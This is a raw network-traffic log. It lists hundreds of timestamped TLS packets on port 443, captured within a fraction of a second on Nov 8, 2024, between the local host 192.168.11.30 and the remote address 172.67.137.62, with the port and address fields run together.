                                                                                                        Nov 8, 2024 11:12:04.112392902 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.113655090 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.113667965 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.113795042 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.113795996 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.113840103 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.113840103 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.113846064 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.113888979 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.113989115 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.115206003 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.115219116 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.115432978 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.115432978 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.115441084 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.115478992 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.116164923 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.116178036 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.116301060 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.116301060 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.116308928 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.116398096 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.116449118 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.117794037 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.117805958 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.117968082 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.117968082 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.118016005 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.118021011 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.118113041 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.118814945 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.118828058 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.118956089 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.118956089 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.118963957 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.119081974 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.119081974 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.119793892 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.119817019 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.119927883 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.119927883 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.119982004 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.120024920 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.120024920 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.120029926 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.120076895 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.121308088 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.121320009 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.121478081 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.121478081 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.121485949 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.121607065 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.122879028 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.122889042 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.123086929 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.123086929 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.123094082 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.123193979 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.123997927 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.124008894 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.124142885 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.124142885 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.124150991 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.124245882 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.124294996 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.125202894 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.125212908 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.125339031 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.125339031 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.125384092 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.125432968 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.125432968 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.125437975 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.125534058 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.126823902 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.126836061 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.126964092 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.126964092 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.126971960 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.127008915 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.127131939 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.128204107 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.128215075 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.128341913 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.128341913 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.128436089 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.128442049 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.128489971 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.129170895 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.129182100 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.129813910 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.129813910 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.129813910 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.129821062 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.129863977 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.130328894 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.130338907 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.130487919 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.130487919 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.130495071 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.130532026 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.130532026 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.130633116 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.131912947 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.131926060 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.132047892 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.132047892 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.132092953 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.132092953 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.132097960 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.132201910 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.132889986 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.132903099 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.133084059 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.133090973 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.133131981 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.133184910 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.134567022 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.134576082 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.134699106 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.134706020 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.134763956 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.134763956 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.134892941 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.135992050 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.136004925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.136140108 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.136140108 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.136187077 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.136235952 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.136240005 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.136288881 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.136288881 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.137186050 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.137198925 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.137337923 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.137337923 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.137346029 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.137383938 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.137383938 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.137434959 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.137485027 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.138178110 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.138186932 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.138314009 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.138314009 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.138362885 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.138362885 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.138369083 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.138406992 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.138458967 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.139812946 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.139825106 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.139965057 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.139971972 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.140008926 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.140008926 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.140060902 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.140110016 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.140908003 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.140919924 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.141026974 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.141074896 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.141124010 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.141129017 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.141182899 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.142385960 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.142398119 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.142538071 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.142544985 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.142591953 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.142591953 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.142687082 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.143292904 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.143302917 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.143435955 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.143484116 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.143484116 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.143590927 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.143594980 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.145262957 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.145277977 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.145399094 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.145406008 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.145447016 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.145447016 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.145494938 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.145494938 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.145540953 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.146250010 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.146313906 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.146387100 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.146435022 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.146435022 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.146440983 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.146485090 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.201767921 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.313694000 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.313705921 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.313858986 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.313940048 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.313940048 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.313950062 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.313957930 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.314124107 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.315088034 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.315099001 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.315334082 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.315334082 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.315341949 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.315408945 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.315562963 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.316018105 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.316029072 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.316210985 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.316210985 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.316262007 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.316268921 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.316277027 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.316277027 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.316402912 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.317008972 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.317019939 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.317259073 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.317259073 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.317269087 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.317392111 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.318010092 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.318020105 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.318197012 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.318197012 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.318221092 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.318226099 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.318269014 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.318317890 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.318418026 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.318849087 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.318859100 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.319055080 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.319061041 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.319133043 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.319133043 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.319226027 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.320471048 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.320480108 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.320641041 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.320641041 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.320689917 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.320693970 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.320787907 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.320836067 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.321399927 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.321409941 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.321564913 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.321564913 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.321613073 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.321615934 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.321661949 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.321661949 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.321762085 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.322292089 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.322300911 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.322487116 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.322487116 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.322510958 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.322515965 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.322607994 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.322659016 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.323621035 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.323628902 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.323772907 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.323940039 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.323945045 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.324161053 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.325000048 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.325007915 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.325206995 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.325206995 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.325217009 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.325309992 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.325309992 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.325361967 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.326173067 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.326180935 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.326351881 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.326351881 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.326405048 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.326405048 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.326415062 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.326421976 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.326553106 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327055931 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.327063084 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.327229023 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327229023 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327299118 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327307940 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.327409983 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327476978 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327728033 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.327734947 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.327902079 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327902079 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.327999115 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.328005075 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.328141928 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.329377890 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.329387903 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.329629898 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.329766989 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.329791069 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.329902887 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.330153942 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.330389023 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.330399036 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.330689907 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.330698967 CET44349786172.67.137.62192.168.11.30
                                                                                                        Nov 8, 2024 11:12:04.330940962 CET49786443192.168.11.30172.67.137.62
                                                                                                        Nov 8, 2024 11:12:04.331624031 CET44349786172.67.137.62192.168.11.30
